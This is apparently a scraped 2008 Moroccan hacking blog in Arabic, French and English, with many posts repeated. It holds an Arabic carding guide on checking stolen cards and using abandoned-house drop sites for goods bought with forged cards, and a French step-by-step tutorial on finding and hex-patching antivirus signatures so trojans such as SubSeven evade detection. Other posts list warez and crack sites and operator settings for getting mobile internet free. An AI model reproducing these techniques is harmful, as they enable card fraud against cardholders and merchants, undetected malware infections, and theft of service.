هذا من الكروت الظريفه..لو بدأ ب 4024 0071(اقلب شمال عشان تفهم) اذن فاعرف ان معك واحد.ايضا لو ال"-" بين التواريخ "*" فاعرف انه gold card و لو الL متبوعه ب'_/' بقت "C" فاعرف انه classic card و لو الL بقتP يبقى premier card.......
---------------------------
\\\\\\\\\\\\\
اختبار الكروت
\\\\\\\\\\\\
للأسف شباب هذه قطعه بسيطه لكن لم افهمها لذا سأكتبه بالانجليزيه و على من يفهمها ان يترجمها و ينشرها مع الشكر:
To determine if the cards are any good or not is pretty easy. You go into the store you ripped these things off from and look by their phone. You should see a number and almost allways a merchant number. Another way to find these numbers is to wait untill they dial the numbers. Try to remeber the numbers that they dial. This method is a little better for sometimes written numbers in the stores are forgotten about and might have been changed since the last time they had changed the written copy. Yes, some Target workers are smart enough to memorize a number, and mabye even a merchant number.
When you call this number, and you get passed all the "red tape", then ask if the credit card number is clear for the amount you want to spend.
Ask the operator to cancel the auto withdrawal and hope she will, not many operators are that dumb.
--------------|
الجزء الثالث |
--------------|
The Dropsite(مركز اسقاط المسروقات!!)
\\\\\\\\\\\\\
يجب ان تجد مكانا آمنا لكل الذي اشتريته بالبطاقات المزوره.لو كنت تريد ان تدخل في العميق،ابعثهم على منزلك!!
لتحصل على dropsite جيد يجب ان تجد منزل مهجور.لكن يجب ان يكون منظره كما ان به حياة...عندما تكون جاهزا لطلب الاشياء التي ستشتريها،افعل ذلك ليلا.و اترك رساله عالباب بأن لديك عمل ليلا و ان يتركوا المشتروات في الحديقه الخلفيه.هذه افضل طريقه في رأيي لكن.سأخبرك بطرق اخرى.
استأجر مكانا لمده بسيطه..حتى تحصل على ما تريد و الغي الايجار و اختره مكانا بعيدا عن منزلك حتى تستطيع بعدها الاختفاء من المنطقه.
و هذه اخر طريقه تعتمد عالهاتف اقرأ هذه المحادثه بيني و شركه سوني:
انا:اهلا.انا فلان الفلاني و انا نهتم بالعرض ا
لخاص بجهاز سوني الجديد.و احب ان اتكلم مع احد في الامر
العامل:اكيد.سأخبرك بكل ما يهمك(...كلام عن الجهاز...)
انا:حسنا..يبدوا ان هذا ما احتاجه فعلا.هل استطيع شراءه بالفيزا و يأتي ابن عمي بعد ذلك لأخذه لأني مريض و لا استطيع الخروج؟؟
العامل:طبعا نحن في الخدمه ...الخ..
لكن انا لا احبذ هذه الطريقه..انا افضل الاولى.لكن as u like
الآن اليك تلك النصيحتين:
1-يفضل عندما تتصل للشراء ان تفعل ذلك ليلا ..ساعتها يكون الoperators متعبون و لا يتذكرون ما حدث بعدها
2-اياك اياك من استخدام نفس الdropsite مرتين..عندما تستخدم مكانا ما و تنتهي..انسااااه تماما
و نصيحه اخيره:
الكثير من الهاكرز ماتوا بتلك الطريقه
Many hackers died that way
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
انتهى الكتاب......
ELEctroman
the new is never be dead with the king
exclusive
voila des sites nv et teste par notre équipe plus que 25 fois
site pour navigation anonyme en https : ça marche sur pc et gsm
electroman hacking surfing free
https://gmail.google.com/?dest=http%3A%2F%2Fblablabla.
https://freeonlineproxy.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://unblck.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://helloschool.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://blackdile.com/cgi-bin/nph-gov.aspx/000110A/687474702s7777772r676s6s676p652r636s6q2s
https://ww2.theevader.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29t&hl=1111101001 best had sa"a
https://www.dubaiproxy.com/surf/index.php?q=d3d3Lmdvb2dsZS5jb20%3D&hl=3ed
https://proxyman.co.cc/anonymproxy.info/index.php?q=aHR0cDovL3d3dy5nb29nbGUuc2Uv
https://0302.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5mcg%3D%3D&b=61
https://z-80.com
https://www.coolpanda.
https://www.ninjacloak.com/index.php/1010110A/9bd94580370c55a29ff83d6f7360d14ff55344431278ce4b33a017100?hl=fr&q=hi&btnG=Recherche+Google&lr=
https://www.amgstealth.com/browse.php?u=aHR0cDovL3d3dy5nb29nbGUuY29t&b=15
https://www.pagewash.com/nph-secure.cgi/000110A/uggcf:/=2fjjj.tbbtyr.pbz/nppbhagf/FreivprYbtva=3ffreivpr=3dznvy&cnffvir=3dgehr&ez=3dsnyfr&pbagvahr=3duggcf=253N=252S=252Sznvy.tbbtyr.pbz=252Sznvy=252S=253Suy=253Qse=2526gno=253Qjz=2526afe=253Q1=2526hv=253Qugzy=2526ml=253Qy&ygzcy=3dqrsnhyg&ygzcypnpur=3d2&uy=3dse
voila des sites nv et teste par notre équipe plus que 25 fois
site pour navigation anonyme en https : ça marche sur pc et gsm
electroman hacking surfing free
https://gmail.google.com/?dest=http%3A%2F%2Fblablabla.
https://freeonlineproxy.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://unblck.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://helloschool.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5jb20%3D&b=61
https://blackdile.com/cgi-bin/nph-gov.aspx/000110A/687474702s7777772r676s6s676p652r636s6q2s
https://ww2.theevader.com/index.php?q=aHR0cDovL3d3dy5nb29nbGUuY29t&hl=1111101001 best had sa"a
https://www.dubaiproxy.com/surf/index.php?q=d3d3Lmdvb2dsZS5jb20%3D&hl=3ed
https://proxyman.co.cc/anonymproxy.info/index.php?q=aHR0cDovL3d3dy5nb29nbGUuc2Uv
https://0302.info/browse.php?u=Oi8vd3d3Lmdvb2dsZS5mcg%3D%3D&b=61
https://z-80.com
https://www.coolpanda.
https://www.ninjacloak.com/index.php/1010110A/9bd94580370c55a29ff83d6f7360d14ff55344431278ce4b33a017100?hl=fr&q=hi&btnG=Recherche+Google&lr=
https://www.amgstealth.com/browse.php?u=aHR0cDovL3d3dy5nb29nbGUuY29t&b=15
https://www.pagewash.com/nph-secure.cgi/000110A/uggcf:/=2fjjj.tbbtyr.pbz/nppbhagf/FreivprYbtva=3ffreivpr=3dznvy&cnffvir=3dgehr&ez=3dsnyfr&pbagvahr=3duggcf=253N=252S=252Sznvy.tbbtyr.pbz=252Sznvy=252S=253Suy=253Qse=2526gno=253Qjz=2526afe=253Q1=2526hv=253Qugzy=2526ml=253Qy&ygzcy=3dqrsnhyg&ygzcypnpur=3d2&uy=3dse
الثلاثاء، 10 يونيو 2008
Imedia and maroc telecome your GPRS confeguration is here is here...//// maroc telecome? meditel? envoiyer votre configuration gprs
vous ete client chez meditel ou bien maroc telecome tu vx avoir ta configuration gprs gratuitement voila la solution :
maroc telecome : http://www.mobileiam.ma/param_mobile.asp
meditel : http://meditel.dmc3.sicap-france.com/frontoffice.view
notez bien que tu doit avoir le gprs activer sur ta carte si vous ne savez pas apellez :
meditel : 121
maroc telecome :888
mr electroman news merci et bonne journée
maroc telecome : http://www.mobileiam.ma/param_mobile.asp
meditel : http://meditel.dmc3.sicap-france.com/frontoffice.view
notez bien que tu doit avoir le gprs activer sur ta carte si vous ne savez pas apellez :
meditel : 121
maroc telecome :888
mr electroman news merci et bonne journée
الأحد، 8 يونيو 2008
weebo get fast ur connection with firefox / avoir weebo rapide avec firefox
to have a fast weebo with firefox please fellow the instruction :
Clearing Your Cache/Cookies
Many issue can be alleviated by clearing your browser's Cache and cookies. Before you clear your cache and cookies for the first time, close all of your browsers, then open up a new one.
For Firefox users:
1. Click on “Tools” at the top of the browser window
2. Select “Clear Private Data” from the drop-down menu
3. Put a check mark next to “Cache” and “Cookies”
4. Click on the “Clear Private Data Now” button
Clearing Your Cache/Cookies
Many issue can be alleviated by clearing your browser's Cache and cookies. Before you clear your cache and cookies for the first time, close all of your browsers, then open up a new one.
For Firefox users:
1. Click on “Tools” at the top of the browser window
2. Select “Clear Private Data” from the drop-down menu
3. Put a check mark next to “Cache” and “Cookies”
4. Click on the “Clear Private Data Now” button
السبت، 7 يونيو 2008
msn 8 avec gprs maroc telecome connection presenter par electroman
c'est vos avez une connection iam pirater sur votre pc (voire notre article sur internet gratuit) voila un site ki peux eter utile pour toi de chatter envoyer vos photos et mem avoir une discution rapide
https://meebo.com
mr electroman 078324021
https://meebo.com
mr electroman 078324021
الجمعة، 6 يونيو 2008
c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts
presenter par electroman
c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts
voila le lien www.hackthev3.com have fun
c'est finie avec motorola v3 razer tt ce que vous volez flasher décoder touts
voila le lien www.hackthev3.com have fun
Comment intercepter la signature d'un virus et la changer
Comment intercepter la signature d'un virus et la changer...
Tout d'abord, Qu est ce une signature ???
Une signature est un petit bout de code en Hexadecimal propre a un trojan, qui est détecté par les antivirus.
A quoi peut servir de connaitre ces signatures ?
Si vous savez ou se trouve les signatures , vous pouvez les modifier en Héxadécimal afin de rendre votre trojan indétectable par les AV.
------------------------------
Vous aurez besoin de :
-AVPOFFSET
-Kaspersky (installer sur votre ordinateur)
-Hexiwin (www.telecharger.com), ou un autre logiciel du même genre...
-Un serveur de trojan qui n'a pas été modifié (c'est à dire : non Packer, crypté, bindé, etc...)
------------------------------
Pour commencer, désactivez votre A-V. Ensuite allez dans le répertoire ou il y a les fichiers ".AVC" (exemple : " C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Lite\BASES ").
Si c'est différent chez vous faite tout simplement une recherche sur votre disque dur, de fichiers avec une extension : " .AVC " vous aurez ainsi le répertoire .
Dans ce repertoire vous mettez le programme AVPOFFSET.EXE et le SERVER.EXE.
Ensuite ouvrez une fenêtre MS DOS (démarrer puis exécuter et command) .Allez dans le répertoire ou vous avez mis AVPOFFSET et tapé ceci :
" AVPOFFSET SERVER.EXE "
Ensuite patientez (cela dure +- 1-2minutes)
Puis vous obtiendrez ceci:
SERVER.EXE infected: backdoor xxxxxx
Signature 1 found :
Offset : 511854 ( 7CF6eh)
Length : 7 ( 7h)
checksum: (2FCC5587h)
Signature 2 found:
Offset : 515903 ( 7DF3FH)
Length : 255 ( FFH)
Checksum: ( 5574DDD9H)
Ce qui est écrit ci-dessus est fondamental pour la suite.
Ouvrer ensuite "SERVER.EXE" avec HEXIWIN.
Puis faites " EDIT" puis "GOTO..."A coté d'offset" tapez "511854" et coché la case "DEC" ("511854" est l'offset de la 1 ère signature en Décimal)
Une autre solutions : vous pouviez taper aussi " 7CF6e " et coché la case "hexadécimal" Cela revient au même sauf que cette fois ci l'offset est écrit en Hexadécimal.
Ensuite vous devez obtenir de ce style-ci :
756E5365727669636573000000FFFFFFFF (hexadecimal)
RunServices....... (Ascii)
Cette signature est facile a modifier puisqu'elle détecte seulement par du texte. Dans cet exemple elle détecte le Texte " RunServices "
Pour vous débarrasser de cette signature, il suffit de modifier un peu le texte en ajoutant par exemple des majuscule ou des minuscules. voila qq exemple :
exemple: RunServices ==> runservices ==> RuNServices
Il y a évidemment plein de possibilités de modifications, mais la chose a ne surtout pas faire c'est d'enlever ou d'ajouter un caractère, ce qui aurait pour conséquence que le serveur ne fonctionne pas.
------------------------------
Etudions maintenant la deuxième signature...
Retournez dans " EDIT" puis " GOTO ",tappez l'offset de la 2 ème signature (515903 en décimal)
Vous obtenez ensuite ceci :
8D45F8
Ceci n'est plus une signature aussi simple que la précédente :
Ecrite en hexadécimal,elle est en fait un " LEA EAX,Dword ptr [ebp-08] en assembleur.
Cela signifie que c'est une inscription dans le registre.
Il faut alors trouver une instruction équivalente à celle ci.(avec le même alogorythme)
Bon la y a pas 36 solutions, il faut avoir qq bases en assembleur , j'vous donne l équivalent :
exemple: LEA EAX,Dword ptr [ebp-08] ==> Mov EaX,Dword Ptd ds:[Ebp-08] (un équivalent de cette signature)
Normalement, votre serveur est ensuite plus détecté, ce qui est bien utile , si vous êtes un adepte des trojans célèbres comme subseven, optix pro, etc..
Tout d'abord, Qu est ce une signature ???
Une signature est un petit bout de code en Hexadecimal propre a un trojan, qui est détecté par les antivirus.
A quoi peut servir de connaitre ces signatures ?
Si vous savez ou se trouve les signatures , vous pouvez les modifier en Héxadécimal afin de rendre votre trojan indétectable par les AV.
------------------------------
Vous aurez besoin de :
-AVPOFFSET
-Kaspersky (installer sur votre ordinateur)
-Hexiwin (www.telecharger.com), ou un autre logiciel du même genre...
-Un serveur de trojan qui n'a pas été modifié (c'est à dire : non Packer, crypté, bindé, etc...)
------------------------------
Pour commencer, désactivez votre A-V. Ensuite allez dans le répertoire ou il y a les fichiers ".AVC" (exemple : " C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus Lite\BASES ").
Si c'est différent chez vous faite tout simplement une recherche sur votre disque dur, de fichiers avec une extension : " .AVC " vous aurez ainsi le répertoire .
Dans ce repertoire vous mettez le programme AVPOFFSET.EXE et le SERVER.EXE.
Ensuite ouvrez une fenêtre MS DOS (démarrer puis exécuter et command) .Allez dans le répertoire ou vous avez mis AVPOFFSET et tapé ceci :
" AVPOFFSET SERVER.EXE "
Ensuite patientez (cela dure +- 1-2minutes)
Puis vous obtiendrez ceci:
SERVER.EXE infected: backdoor xxxxxx
Signature 1 found :
Offset : 511854 ( 7CF6eh)
Length : 7 ( 7h)
checksum: (2FCC5587h)
Signature 2 found:
Offset : 515903 ( 7DF3FH)
Length : 255 ( FFH)
Checksum: ( 5574DDD9H)
Ce qui est écrit ci-dessus est fondamental pour la suite.
Ouvrer ensuite "SERVER.EXE" avec HEXIWIN.
Puis faites " EDIT" puis "GOTO..."A coté d'offset" tapez "511854" et coché la case "DEC" ("511854" est l'offset de la 1 ère signature en Décimal)
Une autre solutions : vous pouviez taper aussi " 7CF6e " et coché la case "hexadécimal" Cela revient au même sauf que cette fois ci l'offset est écrit en Hexadécimal.
Ensuite vous devez obtenir de ce style-ci :
756E5365727669636573000000FFFFFFFF (hexadecimal)
RunServices....... (Ascii)
Cette signature est facile a modifier puisqu'elle détecte seulement par du texte. Dans cet exemple elle détecte le Texte " RunServices "
Pour vous débarrasser de cette signature, il suffit de modifier un peu le texte en ajoutant par exemple des majuscule ou des minuscules. voila qq exemple :
exemple: RunServices ==> runservices ==> RuNServices
Il y a évidemment plein de possibilités de modifications, mais la chose a ne surtout pas faire c'est d'enlever ou d'ajouter un caractère, ce qui aurait pour conséquence que le serveur ne fonctionne pas.
------------------------------
Etudions maintenant la deuxième signature...
Retournez dans " EDIT" puis " GOTO ",tappez l'offset de la 2 ème signature (515903 en décimal)
Vous obtenez ensuite ceci :
8D45F8
Ceci n'est plus une signature aussi simple que la précédente :
Ecrite en hexadécimal,elle est en fait un " LEA EAX,Dword ptr [ebp-08] en assembleur.
Cela signifie que c'est une inscription dans le registre.
Il faut alors trouver une instruction équivalente à celle ci.(avec le même alogorythme)
Bon la y a pas 36 solutions, il faut avoir qq bases en assembleur , j'vous donne l équivalent :
exemple: LEA EAX,Dword ptr [ebp-08] ==> Mov EaX,Dword Ptd ds:[Ebp-08] (un équivalent de cette signature)
Normalement, votre serveur est ensuite plus détecté, ce qui est bien utile , si vous êtes un adepte des trojans célèbres comme subseven, optix pro, etc..
site web pour tt vos telechargement derb ralef cest ici
derb ralef
humm logicielles a 10dh tt le derb ralef c'est d'ici ils télécharge et ils vents
alors profiter
catégorie 1 présent par mr electroman
http://www.pegasoft.cz/
http://www.ddlworld.com/
http://www.bg-warez.org
http://www.101uses.com/ ãÊÚÏÏ ÇáæÙÇÆÝ
http://stormzone.org/news.php
http://qpxqp.com/weblog.php/weblog.php?id=C0_1_1
http://www.wolkysoft.us
http://www.soft-best.net
http://www.directwarez.com/ddl.php?page=1
catégorie 2
1. http://www.downshow.com
2. http://www.fixdown.com
3. http://www.ttdown.com
4. http://www.cnyou.com
5. http://www.soft168.com
6. http://www.soft163.com
7. http://www.99soft.com
8. http://www.jetdown.com
9. http://www.1777.net
10. http://www.chinesejia.com
11. http://www.shunsheng.yeah.net
12. http://www.mylizi.com
13. http://www.soft888.com
14. http://www.vdown.net
15. http://www.ttxz.com
16. http://www.winzheng.com
17. http://www.cn911.comwww.ok911.com
18. http://www.crsky.net
19. http://www.ynkm.com
20. http://www.5324.net
21. http://www.soft.88oo.com
22. http://www.iskydown.com
23. http://www.downbest.net/?1key.126.com
24. http://www.pcsight.com
25. http://www.downsoft.net
26. http://www.softicp.com
27. http://www.heibai.net
28. http://www.hanzify.org
29. http://www.911joy.com
30. http://www.downme.com
31. http://www.soft999.com
32. http://www.51xz.net
33. http://www.ydxz.cn.st
34. http://www.cehgx.126.com
35. http://www.xpblue.com
36. http://www.zhtx.net
37. http://www.whatisnet.net
38. http://www.cyoo.net
39. http://www.adownb.com
40. http://www.weste.netwww.softuser.com
41. http://www.9iv.com/down/
42. http://www.fbstu.com/index.asp
43. http://www.gupin.com
44. http://sz1001.net/
45. http://www.258soft.com/
pour les crack et serial
http://world.altavista.com/
http://www.systransoft.com
http://www.serilas.com
mr electroman
humm logicielles a 10dh tt le derb ralef c'est d'ici ils télécharge et ils vents
alors profiter
catégorie 1 présent par mr electroman
http://www.pegasoft.cz/
http://www.ddlworld.com/
http://www.bg-warez.org
http://www.101uses.com/ ãÊÚÏÏ ÇáæÙÇÆÝ
http://stormzone.org/news.php
http://qpxqp.com/weblog.php/weblog.php?id=C0_1_1
http://www.wolkysoft.us
http://www.soft-best.net
http://www.directwarez.com/ddl.php?page=1
catégorie 2
1. http://www.downshow.com
2. http://www.fixdown.com
3. http://www.ttdown.com
4. http://www.cnyou.com
5. http://www.soft168.com
6. http://www.soft163.com
7. http://www.99soft.com
8. http://www.jetdown.com
9. http://www.1777.net
10. http://www.chinesejia.com
11. http://www.shunsheng.yeah.net
12. http://www.mylizi.com
13. http://www.soft888.com
14. http://www.vdown.net
15. http://www.ttxz.com
16. http://www.winzheng.com
17. http://www.cn911.comwww.ok911.com
18. http://www.crsky.net
19. http://www.ynkm.com
20. http://www.5324.net
21. http://www.soft.88oo.com
22. http://www.iskydown.com
23. http://www.downbest.net/?1key.126.com
24. http://www.pcsight.com
25. http://www.downsoft.net
26. http://www.softicp.com
27. http://www.heibai.net
28. http://www.hanzify.org
29. http://www.911joy.com
30. http://www.downme.com
31. http://www.soft999.com
32. http://www.51xz.net
33. http://www.ydxz.cn.st
34. http://www.cehgx.126.com
35. http://www.xpblue.com
36. http://www.zhtx.net
37. http://www.whatisnet.net
38. http://www.cyoo.net
39. http://www.adownb.com
40. http://www.weste.netwww.softuser.com
41. http://www.9iv.com/down/
42. http://www.fbstu.com/index.asp
43. http://www.gupin.com
44. http://sz1001.net/
45. http://www.258soft.com/
pour les crack et serial
http://world.altavista.com/
http://www.systransoft.com
http://www.serilas.com
mr electroman
imedia connection gratuit
internet gratuit avec le service imedia comment.?
pour avoir imedia gratuit sur ton mobile enter ces paramters svp
avant tt assurer que ta carte Sim et active gprs si nn appelle 121
comment connaitre la cart si activer ou bien nn bah si ta jamais apller 121 alors votre cart nest pas active activer la ou bien si ta un nokia un singe G apparaitre sur onglet resau ou bien de flèche ce montre
manuel
proxy 10.8.8.8
apn:wap.meditel.ma
id utilisateur MEDIWAP
mot de passe :MEDIWAP
authentification : sécurise
automatique
entrer dans ce site et env les paramètres a ton mobile puis changer onglet sécurité en activer
http://meditel.dmc3.sicap-france.com/frontoffice.view
remarque si votre mobile acceptes le certificat shh et rsa si nn tu px pas accéder gratuitement plus d'information sur shh et rsa voire article sur imedia
c'est tt merci
pour avoir imedia gratuit sur ton mobile enter ces paramters svp
avant tt assurer que ta carte Sim et active gprs si nn appelle 121
comment connaitre la cart si activer ou bien nn bah si ta jamais apller 121 alors votre cart nest pas active activer la ou bien si ta un nokia un singe G apparaitre sur onglet resau ou bien de flèche ce montre
manuel
proxy 10.8.8.8
apn:wap.meditel.ma
id utilisateur MEDIWAP
mot de passe :MEDIWAP
authentification : sécurise
automatique
entrer dans ce site et env les paramètres a ton mobile puis changer onglet sécurité en activer
http://meditel.dmc3.sicap-france.com/frontoffice.view
remarque si votre mobile acceptes le certificat shh et rsa si nn tu px pas accéder gratuitement plus d'information sur shh et rsa voire article sur imedia
c'est tt merci
IMEDIA et il gratuit .??
pour quoi i media est gratuit avec des utilisateur de service mais il ne marche pas avec des autres membres du service imedia même si l'option du sécurité et active?.?
réponse : après des longes recherches que je fais personnellement je trouve que le secret c'est dans les certificats de identification en gros c'est le shh et rsa plus dinfo sur google
si votre gsm utilise les certificat shh ou bien rsa votre téléphone peux ce connecter a internet gratuitement mais si c'est le contraire vos ne pouvez pas alors il faut payé pour ça :)
et c'est pour ce la en trouve que il y a des membre qui utilise gratuitement le service après avoirs activer loption de sécurité et d'autre malgré ça ne peuvent pas ce connecter
merci votre frer amine raghib alias electroman
réponse : après des longes recherches que je fais personnellement je trouve que le secret c'est dans les certificats de identification en gros c'est le shh et rsa plus dinfo sur google
si votre gsm utilise les certificat shh ou bien rsa votre téléphone peux ce connecter a internet gratuitement mais si c'est le contraire vos ne pouvez pas alors il faut payé pour ça :)
et c'est pour ce la en trouve que il y a des membre qui utilise gratuitement le service après avoirs activer loption de sécurité et d'autre malgré ça ne peuvent pas ce connecter
merci votre frer amine raghib alias electroman
attention maroc telecome free connection to ur pc
how to get free connection to ur pc via gprs connection ???
humm is easy
what do you need before
cabel: between ur pc and gsm phone
pc suit : if u have a cabel for ur phone u need a driver+ pc suit is also in ur cd or tray to search and download ur dirver.
each gsm has proper dirver so if u have like for exmpel nokia u must found pc suit for nokia and download it
firefox: if u want have a fast connection than u must have download firefox is usiful than internet explorer
sll surfing link : the sll is a secure serfing but is not all u must be in ssl mode and anonymos so for this reason this is the anonymos browser that u must us
https://linkitto.com
https://www.beatfiltering.com
dont froget if the first browser is blocked tray the secound and vers versa
ok after have the tooles let's go
1 install ur pc suit
2 install ur firefox
2 go to ur pc suit and in internet insert this configuration
acess point : mmsiam
user : let the box blank
password : let the box blank
after that push connect
after connection go to firefox in tools go to option and after that to advance and network go to setting and slect manuel proxy and insert this configuration
proxy 10.16.35.50 port 8080
slect ok and exit
go to adress insert https://linkitto.com
after the page has been download insert in the blank box ur adress and have a nice surfing
humm is easy
what do you need before
cabel: between ur pc and gsm phone
pc suit : if u have a cabel for ur phone u need a driver+ pc suit is also in ur cd or tray to search and download ur dirver.
each gsm has proper dirver so if u have like for exmpel nokia u must found pc suit for nokia and download it
firefox: if u want have a fast connection than u must have download firefox is usiful than internet explorer
sll surfing link : the sll is a secure serfing but is not all u must be in ssl mode and anonymos so for this reason this is the anonymos browser that u must us
https://linkitto.com
https://www.beatfiltering.com
dont froget if the first browser is blocked tray the secound and vers versa
ok after have the tooles let's go
1 install ur pc suit
2 install ur firefox
2 go to ur pc suit and in internet insert this configuration
acess point : mmsiam
user : let the box blank
password : let the box blank
after that push connect
after connection go to firefox in tools go to option and after that to advance and network go to setting and slect manuel proxy and insert this configuration
proxy 10.16.35.50 port 8080
slect ok and exit
go to adress insert https://linkitto.com
after the page has been download insert in the blank box ur adress and have a nice surfing
driver adress web site
hi !!! and welcome
mr amine from morocco
age ;22
my mission is to help u in ur life
my pics here u found it
http://www.fileden.com/files/2008/6/1/1939264/17022008%28006%29.jpg :) dont worrey is not trojan
ok let's start my first topic
i choose for u the best web site to found your driver who u looking up have fun -eng-
je choisie pour vous les meilleur adresse web pour vos driver
http://www.driverzone.com/
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://driverpacks.net/Projects/DriverPacks/
http://driversguide.com/
http://www.totallydrivers.com/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/
Direct X:
http://www.microsoft.com/windows/directx/default.aspx
Video/graphics drivers:
Nvidia:
http://www.nvidia.com/content/drivers/drivers.asp
Ageia:
http://www.ageia.com/products/drivers.html
Ati:
http://www.ati.com/support/driver.html
Tv Tuner Cards:
http://www.tv-cards.com/drivers.php
Sound Drivers:
Creative Labs Sound Blaster:
http://us.creative.com/support/downloads/
Part Manufacturer Drivers:
Hp:
http://www.hp.com/country/us/en/support.html
Xfx:
http://www.xfxforce.com/web/support/drivers.jspa
Asus:
http://support.asus.com/faq/faq.aspx
D-link:
http://support.dlink.com/downloads/
Lg:
http://www.lge.com/support/software.jsp
Cannon:
http://www.usa.canon.com/consumer/co...wnloadIndexAct
Lexmark:
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
Chaintech:
http://www.chaintechusa.com/tw/eng/Download/
Msi:
http://www.msi.com.tw/program/suppor...t_dvr_list.php
Biostar:
http://www.biostar-usa.com/downloadmain.asp
Razer:
http://www.razerpro.com/index.php?op...d=13&Itemid=27
Abit:
http://www.abit-usa.com/downloads/
Epson:
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
Mach:
http://www.machspeed.com/products.htm
Linksys:
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
Pioneer:
http://www.pioneer-eur.com/eur/conte...t/support.html
Diamond:
http://www.diamondmm.com/newarchivelicense.php
Iomega:
https://iomega-na-en.custhelp.com/cg...ci/product.php
Mitsubishi:
http://www.mitsubishi-electric.com.a...oads/index.htm
Zboard:
http://www.zboard.com/global/downloads/drivers.asp
Belkin:
http://www.belkin.com/support/download/download.asp
Samsung:
http://www.samsung.com/support/produ...oad/index.aspx
Viewsonic:
http://www.viewsonic.com/support/drivers/index.cfm
Plextor:
http://www.plextor.com/english/suppo...s/drivers.html
Liteon-It:
http://www.liteonit.com/global/index...pper&Itemid=75
Microsoft:
http://www.microsoft.com/hardware/mo.../Download.mspx
Gigabyte:
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
Logitech:
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
Voodoo:
http://www.voodoofiles.com/
Intel:
http://downloadfinder.intel.com/scri...port_intel.asp
Cisco:
http://www.cisco.com/en/US/support/index.html
Computer Manufacturer Drivers:
Dell:
http://support.dell.com/support/downloads/index.aspx
Apple (mac) :
http://www.apple.com/downloads/macosx/drivers/
Shuttle:
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
Hp:
http://www.hp.com/country/us/en/support.html
Sony:
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
E-Machines:
http://www.emachines.com/support/product_support.html
Voodoo Game Doctor:
http://www.voodoopc.com/authorization/myaccount.aspx
Alienware:
http://support.alienware.com/Support...port_Area.aspx
Acer:
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
Toshiba:
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
Other
http://www.digg.com/software/Almost_...Hate_Searching
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
Drivers:
http://www.driverzone.com/
http://www.nvidia.com/content/drivers/drivers.asp
http://www.helpdrivers.com/
http://www.pcdrivers.com/
http://www.microsoft.com/hardware/mo.../Download.mspx
http://www.digg.com/software/Almost_...Hate_Searching
http://driverpacks.net/Projects/DriverPacks/
http://www.ageia.com/products/drivers.html
http://www.gigabyte.com.tw/Motherboa...r_GIGABYTE.htm
www.driversguide.com
http://www.logitech.com/index.cfm/do...CA/EN,CRID=270
http://downloadfinder.intel.com/scri...port_intel.asp
http://www.hp.com/country/us/en/support.html
http://support.dlink.com/downloads/
www.totallydrivers.com
http://www.lge.com/support/software.jsp
http://www.xfxforce.com/web/support/drivers.jspa
http://support.asus.com/faq/faq.aspx
http://www.pcpitstop.com/driverscan.asp
http://www.voodoofiles.com/
http://www.usa.canon.com/consumer/co...wnloadIndexAct
http://support.lexmark.com/cgi-perl/...s=37:1:0:0:0:0
http://www.chaintechusa.com/tw/eng/Download/
http://www.msi.com.tw/program/suppor...t_dvr_list.php
http://www.biostar-usa.com/downloadmain.asp
http://www.razerpro.com/index.php?op...d=13&Itemid=27
http://www.abit-usa.com/downloads/
http://www.epson.ca/cgi-bin/ceStore/...seBVCookie=yes
http://www.machspeed.com/products.htm
http://www.pcworld.com/downloads/bro...,1,pg,1,00.asp
http://www.linksys.com/servlet/Satel...VisitorWrapper
http://www.linksys.com/
http://www.pioneer-eur.com/eur/conte...t/support.html
http://www.diamondmm.com/newarchivelicense.php
http://esupport.sony.com/perl/select...IRECTOR=DRIVER
http://www.emachines.com/support/product_support.html
https://iomega-na-en.custhelp.com/cg...ci/product.php
http://www.mitsubishi-electric.com.a...oads/index.htm
http://www.zboard.com/global/downloads/drivers.asp
http://www.belkin.com/support/download/download.asp
http://www.samsung.com/support/produ...oad/index.aspx
http://www.viewsonic.com/support/drivers/index.cfm
http://global.shuttle.com/download/download.asp
http://sys.us.shuttle.com/Scgsupport/Support2.htm
http://www.plextor.com/english/suppo...s/drivers.html
http://www.liteonit.com/global/index...pper&Itemid=75
http://www.tv-cards.com/drivers.php
http://www.planetamd64.com/index.php...=64bit+drivers
http://www.nzone.com/object/nzone_do...etadriver.html
http://www.nvidia.com/page/uli_drivers.html
http://global.acer.com/support/index.htm
http://support.acer-euro.com/drivers/
http://www.csd.toshiba.com/cgi-bin/t...ceghdgngdgmn.0
http://www.cisco.com/en/US/support/index.html
http://support.dell.com/support/downloads/index.aspx
http://www.apple.com/downloads/macosx/drivers/
http://www.printer-drivers.com/
http://www.windrivers.com/
http://www.usb-drivers.com/
http://www.usbman.com/Drivers%20and%20Patches.htm
http://www.bootdisk.com/usb.htm
http://www.linux-usb.org/
creative sound:
http://us.creative.com/support/downloads/
direct x home page
http://www.microsoft.com/windows/directx/default.aspx
ati driver home page
http://www.ati.com/support/driver.html
__________________
mr amine from morocco
age ;22
